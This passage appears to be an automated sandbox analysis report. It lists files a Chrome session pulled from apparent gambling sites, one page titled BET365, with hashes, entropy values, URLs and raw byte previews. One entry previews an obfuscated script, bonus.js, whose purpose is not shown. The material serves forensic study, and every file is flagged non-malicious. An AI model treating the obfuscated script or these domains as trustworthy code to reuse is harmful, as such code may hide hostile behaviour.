                                                                                                                                                          SSDEEP:96:uYR25AjLna4MK04BGrfs7hG9nYuLyHQOCxbM9Qml4lc:/FXa4MKvkrghG9Yk8Ct0Wc
                                                                                                                                                          MD5:51FDF17068E84A28557E6E3A2B5E2DBB
                                                                                                                                                          SHA1:13E1E46E5C4A197AA3E0D28E60291D94519B8388
                                                                                                                                                          SHA-256:0FEE5018735220F2F1E5FE7871304A114DE261E21802F50B6598F63081822805
                                                                                                                                                          SHA-512:3AF1BB9FE30F98D0F69C897075A1D3F4E8ABB2ACF66A858D8B147E56E5F98AFD79B06A5D3F61199784CB9A704FEDB3D353AFD99952978BF6E15F314127FF0B14
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...2...$......i7....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:E2B0A30B4EB611E9B6AF98114C107AF1" xmpMM:DocumentID="xmp.did:E2B0A30C4EB611E9B6AF98114C107AF1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E2B0A3094EB611E9B6AF98114C107AF1" stRef:documentID="xmp.did:E2B0A30A4EB611E9B6AF98114C107AF1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......`IDATx..XytS..=.i.%K.e.W.6....c0..`6......H&.!L.0..dJI...4i.Rj.4..Y..3.,....[..ly.%k..'i..?fJs.s.?..{.;..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37611
                                                                                                                                                          Entropy (8bit):7.986257628578156
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:G3CMdjnXqEKVBNgiBKxNpBG+Orz3cdOeJMiDJF4GUcitw:GyMdnXNniBODo/eCiNek
                                                                                                                                                          MD5:E9F09C5B7D57BBAC9852DA8F7139D697
                                                                                                                                                          SHA1:72E2C0458D259DC01AB3A571CA7BC8AF04D861A1
                                                                                                                                                          SHA-256:03538933134C643D3FBCE974E8573A82A98507716FD647B4BDE6298622B76294
                                                                                                                                                          SHA-512:1CC5AE3BBDC44DA6B4665826EF828D6DBDD4C0635794915F996EB191823AEA3C159EFD2C03F4D8EA21D92A223E0513FF29762FDE5C8F5AD999D679EFD551C7D8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/casino/03.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...u.d.u....jS.a.&.f..e.Lq.1.(K.....q.{....N..c.,..b.h@#........cw...Q....y..gK.s.t..j...-.......x.p.g......6..Aa.......o....f.7.+...>........I...k3h/...?2)t.zi...a[.^....E...)._3._/,.@.`....O...T.P..D.:H..'..........".1...G..\.rWcj..x.p..f....=...o.n.Xg..&c..}f....*).|...v..A F..B..K".....?................M.Y...6.O.OzNJ.A.......'._..t....._...?.-..e.W.6.P..h#....?l<U...v.G..C....[>..,.D..(..u...l...{.$.A.u.....".?1W.]i.....y.....)9..<:....}c3R........@8.NbE~G...s.!...a{.b...<.a........A.sA.....h...8...Z7.EX$......r..QXLg&...#..h.W2.........w.Y.....Y........X.Z..t.F!.p...y......~.....kp>.........U`.g.OP..p...R..E P.$.).B.S.3......B.,..."...J...(._.wG.*Rw...?.8.c....5..Q=...g.y~M...~.+.........%d..s..p~.E/.Ae.B.ZT+9R{.c..*@.. %..a,..`...N...s../....../~..V/}.[#T.q..T>D}<.......o...C.hq.k.....>..z...D...Ej...oh.#..G...k.g>W......M...\..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1823
                                                                                                                                                          Entropy (8bit):7.128143305251574
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:euinNuiVprKeJ3jt7IhEXtPxaRxngxTfKZhpTPr:2NoG7IhE9PEAM/T
                                                                                                                                                          MD5:29FFB1C72B8ABB2705B044AFD206B78F
                                                                                                                                                          SHA1:6409A4B4EBF0F3BFEC03B976629ECF0CAF17BB69
                                                                                                                                                          SHA-256:3C3D8821368D28F376C4CBC0009D73280331BCE3AAE3DD4B3E9819795188E67D
                                                                                                                                                          SHA-512:C9569BA594693AAF2D09B6E3110F4B978BA2C0A532FCB354C71E3ABF730BBF7D901E01B61490D45C5E26E5DD5890AD1263B16CF58580702D85B238507DA8CC87
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:1B03F615F77811E79594A93B56FBC396" xmpMM:InstanceID="xmp.iid:1B03F614F77811E79594A93B56FBC396" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a581549a-d504-de42-880f-f1f6b1e4689b" stRef:documentID="adobe:docid:photoshop:fe692dff-f776-11e7-8e5d-cdd6397f58a0"/> </rdf:Description
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):444866
                                                                                                                                                          Entropy (8bit):4.8439013609861785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:QY3F0zOnsq298V9VBFmW6gyEtdJNGbdYbLDtaTz0vs2kd4MYwCh0SuJaMT:QYVbdibdY5aH0vsDGMYwCh0SuJa8
                                                                                                                                                          MD5:6754F69F482B8FDDAB8155B7E7ED5C9E
                                                                                                                                                          SHA1:58BE745A1B4CB606FCBA47FCAF74FA481B392258
                                                                                                                                                          SHA-256:5D1C38229EC2E0F6A5EE170301C1BA8663E938042785A9BE3157A8B31F7CC27A
                                                                                                                                                          SHA-512:57E880D8F8F0D03EBF248F390B28FEBDD401EE9241B071F3DE81F27602541FF02625F192B2D8BDCC497F2666CCC9902BD8A238021B365773A42D46EA04F8DC68
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://x551005.com/
                                                                                                                                                          Preview:<!DOCTYPE HTML>.<html lang="zh-CN">.<head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge" />. <meta name="renderer" content="webkit|ie-comp|ie-stand">. <title>BET365</title>.<link rel="bookmark" source-href="https://brhrjf.yuhu06.xyz/ftl/commonPage/images/favicon/favicon_1761.png">.<link rel="shortcut Icon" source-href="https://brhrjf.yuhu06.xyz/ftl/commonPage/images/favicon/favicon_1761.png"/>.<link rel="stylesheet" href="https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/gui-base.css">.<link rel="stylesheet" href="https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/gui-skin-default.css">.<link rel="stylesheet" href="https://brhrjf.yuhu06.xyz/ftl/bet365-1761/themes/style/common.css">.<link rel="stylesheet" href="https://brhrjf.yuhu06.xyz/ftl/bet365-1761/themes/style/bootstrap-dialog.min.css">.<script type="text/javascript">. var imgRoot='/fserver';.</script>. [if lt IE 9]>.<script src="/ftl/commonPage/js/html5.js"></script>.<![endif]-->.</head>.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 78 x 34, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3564
                                                                                                                                                          Entropy (8bit):7.780617932233728
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:72yWTD5G2DJCiN0HmNqWBoOXQLSaXl3BH:45AiEm4W85lZ
                                                                                                                                                          MD5:CCDDC0345203E7ADBE16D6613FD62EF1
                                                                                                                                                          SHA1:4E042BC37398A1E6DC0BE64074B013F58FD85AFF
                                                                                                                                                          SHA-256:5D907B8E4D9CFF99CEC071CB0516246EDBE0E3A101FBDDDC22E9BBF484A32A89
                                                                                                                                                          SHA-512:7D353A731F587E030E1614E0A45252B73EDCD33BC0E40A9F1EE43142759F91E8AD489B7519DA4D0CCC3774BE526E8D25085FA6F6C9E15A5591806D7695F9C9CA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...N...".......<....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:D0F8AD0F7B7A11E89DB0E9DB09C8A4A4" xmpMM:DocumentID="xmp.did:D0F8AD107B7A11E89DB0E9DB09C8A4A4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D0F8AD0D7B7A11E89DB0E9DB09C8A4A4" stRef:documentID="xmp.did:D0F8AD0E7B7A11E89DB0E9DB09C8A4A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..2...\IDATx.Zkl.W..;;.~'N..Qb.'.6N..iE.4.B.P.....@......?.@.H<... $HC..#m)..G..!-J...E!..4.M..W..]{g..y.x.g..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15721
                                                                                                                                                          Entropy (8bit):7.951906564348781
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:dKczy4UH/wjIDwYeQYJsBxAHUED+jPNaB7PeeNsGiOhj:oWybH/wjIXJKCgp2N67aVOt
                                                                                                                                                          MD5:CF546C6FD6FFD1448867E707453F53F8
                                                                                                                                                          SHA1:C00AF79E1A3B5BA95D05DC83807403BF12E3BA17
                                                                                                                                                          SHA-256:D2B002C3665CAFB298339F3DADCAAC9595EDC7565F79BFB5602369300ED59426
                                                                                                                                                          SHA-512:298F6272660EF8D487EF7C1106DC0C95392D6F7DB891E4694C6024E8778DC95DD182B00A89AB7FF4E6C72D4AC0038D37AA4049D6C87DE0F5D7C5A7CB2BE8F4D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/mg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D288D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D278D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):503
                                                                                                                                                          Entropy (8bit):7.373312873787653
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7Q/6ThoPN1TiBm72T+p4PErWU9a5x8ezQo44NPeJLEEAgCN:V/6NoPNZ7ISZWZWoDjPwLzHCN
                                                                                                                                                          MD5:39396FBD60E65FEB9826920AF0B6B54D
                                                                                                                                                          SHA1:AEBBFFEF8F6239834D69069EE361C8F0DA01A6D8
                                                                                                                                                          SHA-256:C43FAFFD61928F2AE25F089095F39B8448BF9D0E1627B7D5FA0266A1C7FA7938
                                                                                                                                                          SHA-512:FAA4026ACAF7BDC60DE6F9EA06CB6E76A5B8F489A398AC7A261A2C1719678BAEEE967C6427DE5C37AB04EA91CBC42C1C1627D3A8BCD18B51249D087240C77E91
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/login/password_n.png
                                                                                                                                                          Preview:.PNG........IHDR.....................pHYs.................IDAT8...1h.q...... . RMH.d....P..H+U.&........ZD.v.K...[.".. .A.Z;.%.....] .w..?............w..(..h.....W...<..v).....Tc....4....NS........*V.....o.Z.P..1...N.....j....]..q.t<.z.......(.+F.kZ...%.?6.X...,.bNx5...>..NS.Xq..-........9.Nz....o.W.[......r.........b.t.p .wk....X_{.f.`+.4P....U*.[..../..][............W..S$Q.N.U..N.m...~..<Jr.-^.R.U..\.|....G.]..:...[.bu...&......p.\.b.?.W.,2O........P.......`.........IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1740), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1740
                                                                                                                                                          Entropy (8bit):5.863746419169325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VE9RvUBzEM5vmLi6gtlM/E307UJsswEwNX85oVbR:VE9RQBmu6gtC77UQNX5bR
                                                                                                                                                          MD5:D41604EED8C01D725D5082FD2039463B
                                                                                                                                                          SHA1:D9843674196CFD4C67E247927C78CD58BFB38094
                                                                                                                                                          SHA-256:5B8264FD10F490EFF4AC621CE175CFD0CE511CFB34A556BCF760B0759499AA8D
                                                                                                                                                          SHA-512:4BC476EAA3CE2FDB70054AD701062AD3E61B10F15780557DC383047313A0777D16791E002150EFAA875300B4B640236020E6D69F04420A79959919AC68CA1A2B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/bonus.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYAmAXQBoBvAVQCUBNALwC4AzAVzRgBcBLdTN3K8AlJQC+5AE4BzAJwBPNpx780g4eRRiAROyQgABEm5TePHQG4A8mABWIHgDoAJiFa80IAApSUEECluBUxech0AfQiQJABZFBd2ABsQHSoANygk9hBmAEIABnERS0ypQzQAXhRMHQARFwAOYB0RchBqp3U0NqRq2oKYCFZW6X6dADl6AA9rUfZKzBBMEUwJclsHHkwpJwBbKAgAcRBubkCkVewdXiQAGRQZTzSdMHR9XxQ929TSNsoZKcJihgAAVXh7XIcLh8ARiKSndhSNCGbgAC1uTm4KAAQnZwZDBBikE4YCh2BB0ABJNCsFBOExQIIEkAiADUOkMAD9DIAG50AFOo6cTFKguKDcKDKGFqFaUBHcJFoShkinU2koZjrW4ACU83AAymiQflcMIkHVTlBeElDca8rhheRgOKYGjNbcHk80FLVAJuGJuAB+dGYwHcADC5MpaBpdJWzCJmJ1ettwEq9vIIZJtwtEutqfTuBEkjeaA+fm+Bh9sPU/soZUMvEqWcs3AAZG3uFi0SB1NDfbWA05An4pIGSW5WFBkl3qHwkk4soFuAB1JloTwyQTDqSj/YxJBQQEiZi4SrNpwIpAzpy3HGeFyR9jedD6058NAyDtdq837ESpInxfNAAEE9nJNAg1CW8kF1SCC0KYRSSjNU6QvX8kn9BNeBguCDSNNMMxwnNLXzAjCyQlVo1jFB0JiGdi2LSQyT2CB2HOFxmGWVZ1k2RxuB2fZDhOM4LiuG57keZ5wlLcsvh+HQ/ioMNgTBCEoRUGtZXlRVUWJLFcXxdTExJKjUPpRlmXU9lOR5AUhRFSF0QSJBNTDJ9qPVasZTEEyYM9TwAB9AqzGDvBXERv30gASEwUARZC9m+ASdH1ABRUEIhxawJmofVvFoaxYipdK0gndxp0wpwQIgXg3y
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2279
                                                                                                                                                          Entropy (8bit):6.883737991076074
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:x/6/zNnwknA9Wp8EsLcJ3T3zHFGyuQPEInp/Sxx5CEK+:xSBwknmWp8fMHFGQPE2Sxx5Ce
                                                                                                                                                          MD5:DD96633E29503CAF2EC2997CE4AB638F
                                                                                                                                                          SHA1:83DFAD13F9E3283599F4B0187034D692F37A28DE
                                                                                                                                                          SHA-256:C33D39FB33BF8B8EF1F3E27ABC824C851B8DBCE3E50B78E882E6EF7738DE6855
                                                                                                                                                          SHA-512:7AE62FC6C2C33375194755FD7279853F54996014B5BD105B707166C8F9398A9489BFA6C6482809CD5B870DA500195DE6BCA4C995E3C0E54F1B673693D5C69523
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............w=.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:26:37+08:00" xmp:MetadataDate="2023-07-24T11:26:37+08:00" xmpMM:InstanceID="xmp.iid:29617963-8eac-4dfc-8f22-41532ed9cc03" xmpMM:DocumentID="xmp.did:DD74A15AF3A011E7908999C7A81A326F" xmpMM:OriginalDocumentID="xmp.did:DD74
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):663
                                                                                                                                                          Entropy (8bit):7.521694983048398
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7es/6Tn/YPc17zDKWgDaGJeF5t+/qBOotsnmHR5l9y:w/60Pc1/DKWg+GJA5FBBH7l9y
                                                                                                                                                          MD5:EF972EB21813224CC000334C3BC94A01
                                                                                                                                                          SHA1:EE1D39BF57907F6D9B42D140E07BDF1FF85ADD50
                                                                                                                                                          SHA-256:59386AFD3F9245FB3A774C44E4D6C720CD09D3E21F32C28BBEC26958CE2C87DF
                                                                                                                                                          SHA-512:451D4F0DB3D479439A77DA0194C293A4A859986546C68FB92F3BFC980EAC54785AFEC6F7283FC070B0A23C96727A09B37893F3A39918C2E822F944749B762FF1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_astar_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs................IIDATH...K.Q...O.0."3.UEX...] *,.".....*...M.......B.A..$*..Y.VdT...Rj7..o..1...o...9.s.sR*c!9c.....g...8....G.Aj..d9P.....s ?t.".S...C.J...b.=....Z..Jr.S......5}.4.k.v.B.........1?..?q.........\......].......e.d`.P......{@G.Y.,.^...x...S.v.*..h.....N`%...V...R..v.(....#.]iTlSw....N..z)..N.V=.6..P[......}F,..}..;..1..y.....UEL..nQ?G..MF.w..Z.z..|S_.....l.I.V..L..P'...v..j.z6.^..s..$m%0!x..zmp&...K......R.).S`.PE..5............:. ..E.m.......<.......7.yQ.]Q...H."..5jI\.AG...t.Z......n....A.Z..Sg..#...VW...c$....9....+.. ....YP0"...k....Y.,.........S......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 219 x 79, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17880
                                                                                                                                                          Entropy (8bit):7.9720327118657455
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:+Sy4otyOBWOi0aQ4kz/Ic+qQhq8KASjItf8Gz3rDSFHtg0PvB8CaQ:+Sy4MfDQOQlhawCFHt3p8CaQ
                                                                                                                                                          MD5:4E28BC4C8775CF889141050E16111204
                                                                                                                                                          SHA1:E2976FA0EFC742BBCC430199BD45246847742E4A
                                                                                                                                                          SHA-256:A3612A48E702E8D7B66BE0C60DC113EDEE8C89B98F4F0178947B7AA681FA228C
                                                                                                                                                          SHA-512:1E0A39E36696CE83B19EBFE7B888CB0A4A6EEEA6A4FE02583690518D7ACB771941766ABFCB1C546B6622EEFC45E8EBFCB65033A8AB6EFA1AC3C73999853369CB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......O.....bt......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:58E188C0F3A011E78E288E74AD5EC4CC" xmpMM:DocumentID="xmp.did:58E188C1F3A011E78E288E74AD5EC4CC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:58E188BEF3A011E78E288E74AD5EC4CC" stRef:documentID="xmp.did:58E188BFF3A011E78E288E74AD5EC4CC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>G^....BHIDATx..}...U..33wno{.o...Bh.$@..M..(b.*6T@E.....)....c..*`.TH.....rw...>.{.3s7..K.....d.>s.s..-.....C.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1773
                                                                                                                                                          Entropy (8bit):7.299231445360026
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2D1C3J3/+2dl+zEJQBW+zTW8FYzhMGRBF:zo7F52Wl+wiBW+f2KGLF
                                                                                                                                                          MD5:23AB701F12E5E0D76FD704E02C96043A
                                                                                                                                                          SHA1:0E3AB100DECB72F8CE6CD1A11ED69A5262437761
                                                                                                                                                          SHA-256:C02D92076DBC68B2A86882956CBD429FA78A5AD1926C5A744072AB1EFE8E534D
                                                                                                                                                          SHA-512:FCEA6BF76E77A0C2C75E330282191DB4BA2C696F7C90842A57791C88BD0DD15514FD6DDB64CC90E2BC684823193C529DD44CFAB70A5164B64A6257CB16D9B607
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/serviceico.png
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:AA198FFDA6D711E9A120E12A5DE24F52" xmpMM:DocumentID="xmp.did:AA198FFEA6D711E9A120E12A5DE24F52"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AA198FFBA6D711E9A120E12A5DE24F52" stRef:documentID="xmp.did:AA198FFCA6D711E9A120E12A5DE24F52"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?> ......bIDATx.b...g..`b..`./....j...,.*........{O..<.n..7......O.$.I...=}.k..../|x.. ...&_....6....|......^.-!.V1..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1721
                                                                                                                                                          Entropy (8bit):7.852822511297969
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:w/6zON36zNzyjnh8ctimwek9OSkbsHn9Ap0dwLFJE:wSzYPrttkYe9A1LPE
                                                                                                                                                          MD5:9781464C7C55D9366512DCDD5088AAD2
                                                                                                                                                          SHA1:5D55F50A4132B78F18E0EBB894BCAB130F5B5798
                                                                                                                                                          SHA-256:88BDEEB60E51B3DD2D7505B845879430A1E7AC4A289C4B8B3223BFBBA2DEFBF3
                                                                                                                                                          SHA-512:C31F4E4F3C372A641E2C860880808C3BA4DBDF773F8A2B51F2BD3BCD798C04EA89EC2D9E5EACA2126F24BDC23BCD31DEFAE02260C2638337B6E936B20DB3ED37
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_mt.png
